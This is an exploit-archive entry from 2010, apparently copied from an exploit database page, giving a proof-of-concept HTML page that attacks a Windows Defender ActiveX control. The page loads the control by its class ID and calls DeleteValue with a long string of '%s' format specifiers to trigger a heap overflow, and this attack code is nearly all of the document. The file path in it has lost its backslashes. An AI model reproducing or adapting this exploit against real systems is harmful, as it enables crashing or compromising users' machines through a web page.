[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Microsoft Windows Defender ActiveX Heap Overflow PoC
# Published : 2010-01-19
# Author : SarBoT511
# Previous Title : OpenOffice ".slk" File Parsing Null Pointer Vulnerability
# Next Title : Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC


#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#tested on :[windows 7]
#Microsoft Windows Defender

<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:Program FilesWindows DefenderMsMpCom.dll"
prototype  = "Sub DeleteValue ( ByVal bstrKeyName As String ,  ByVal bstrValueName As String )"
memberName = "DeleteValue"
progid     = "MpComExportsLib.MsMpSimpleConfig"
argCount   = 2
 
arg1="defaultV"
arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.DeleteValue arg1 ,arg2 
 
</script>